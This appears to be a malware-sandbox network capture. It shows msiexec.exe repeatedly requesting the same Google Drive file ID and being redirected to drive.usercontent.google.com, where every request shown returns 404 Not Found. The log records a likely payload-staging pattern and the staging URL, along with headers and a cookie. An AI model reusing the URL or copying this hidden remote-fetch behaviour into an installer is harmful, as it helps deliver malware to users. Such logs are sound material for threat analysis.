                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Content-Length: 1652
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
                                                              2025-01-10 23:02:57 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="XpR8g69fy49wEw7csZH50Q">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              58 | 192.168.2.8 | 49767 | 216.58.206.46 | 443 | 2160 | C:\Windows\SysWOW64\msiexec.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2025-01-10 23:02:58 UTC | 418 | OUT | GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:58 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:58 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-W4HgkpebGOxoOIQ77Qvofw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              59 | 192.168.2.8 | 49768 | 172.217.16.193 | 443 | 2160 | C:\Windows\SysWOW64\msiexec.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2025-01-10 23:02:59 UTC | 460 | OUT | GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:59 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                              X-GUploader-UploadID: AFIdbgR4aHqqIKt2xM_Ete05aufdESMF_kJyeDUlbD8RyOKwy8pi0pJdFaz04teLSHCFcqow
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:59 GMT
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Content-Security-Policy: script-src 'nonce-FCnZDBoxrNP2ohNT_-FG1Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Content-Length: 1652
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
                                                              2025-01-10 23:02:59 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ohP44PB74-chRoPWF6SrLg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              60 | 192.168.2.8 | 49769 | 216.58.206.46 | 443 | 2160 | C:\Windows\SysWOW64\msiexec.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2025-01-10 23:03:00 UTC | 418 | OUT | GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:03:00 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:03:00 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-9KLcRr7E4e3NCiJyyn-CWg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              61 | 192.168.2.8 | 49770 | 172.217.16.193 | 443 | 2160 | C:\Windows\SysWOW64\msiexec.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2025-01-10 23:03:01 UTC | 460 | OUT | GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:03:01 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                              X-GUploader-UploadID: AFiumC5JaV-GwXVGnir7kPp2M9m76bYcVNzOfII5YMZo3e0aWgw3Jcm2TfaJOcjHF6HP0pXQCZiaZcE
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:03:01 GMT
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-6uQy5xcDImAJFpKa5sUbVg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Content-Length: 1652
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
                                                              2025-01-10 23:03:01 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="wvaKC7H00hEL-ad-NLu2uw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              62 | 192.168.2.8 | 49771 | 216.58.206.46 | 443 | 2160 | C:\Windows\SysWOW64\msiexec.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2025-01-10 23:03:02 UTC | 418 | OUT | GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:03:02 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:03:02 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-GoYl2x-WdYI46xxrAw6Iqw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              63 | 192.168.2.8 | 49772 | 172.217.16.193 | 443 | 2160 | C:\Windows\SysWOW64\msiexec.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2025-01-10 23:03:03 UTC | 460 | OUT | GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:03:04 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                              X-GUploader-UploadID: AFIdbgQPTa8zBT2xe9uHEQjLnAb87GeTXZm22HVrFb_F8YzM940G9K7iLHQgeJfRBwUIcfEo
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:03:03 GMT
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Content-Security-Policy: script-src 'nonce-eqodYzHgPbVl8OExEnCV-w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Content-Length: 1652
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
                                                              2025-01-10 23:03:04 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="N59GmPKQiHuOQ1ijPv7_Cw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              64 | 192.168.2.8 | 49773 | 216.58.206.46 | 443 | 2160 | C:\Windows\SysWOW64\msiexec.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2025-01-10 23:03:05 UTC | 418 | OUT | GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:03:05 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:03:05 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Content-Security-Policy: script-src 'nonce-7ZJ7HWPaQ_1YqrWfP1AJWg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              65 | 192.168.2.8 | 49774 | 172.217.16.193 | 443 | 2160 | C:\Windows\SysWOW64\msiexec.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2025-01-10 23:03:06 UTC | 460 | OUT | GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:03:06 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                              X-GUploader-UploadID: AFiumC7kqX-fd5fzeS7KSBlWggjeUUW-7UyxGmjDjS--WYVPiOnzfR4jF8D-SdQLRsk--OQN
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:03:06 GMT
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-kYeicar-jivk2dxedxomeg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Content-Length: 1652
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
                                                              2025-01-10 23:03:06 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Xkm8Crt9HQLLWjAk3kII8A">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              66 | 192.168.2.8 | 49775 | 216.58.206.46 | 443 | 2160 | C:\Windows\SysWOW64\msiexec.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2025-01-10 23:03:07 UTC | 418 | OUT | GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:03:07 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:03:07 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
                                                              Strict-Transport-Security: max-age=31536000
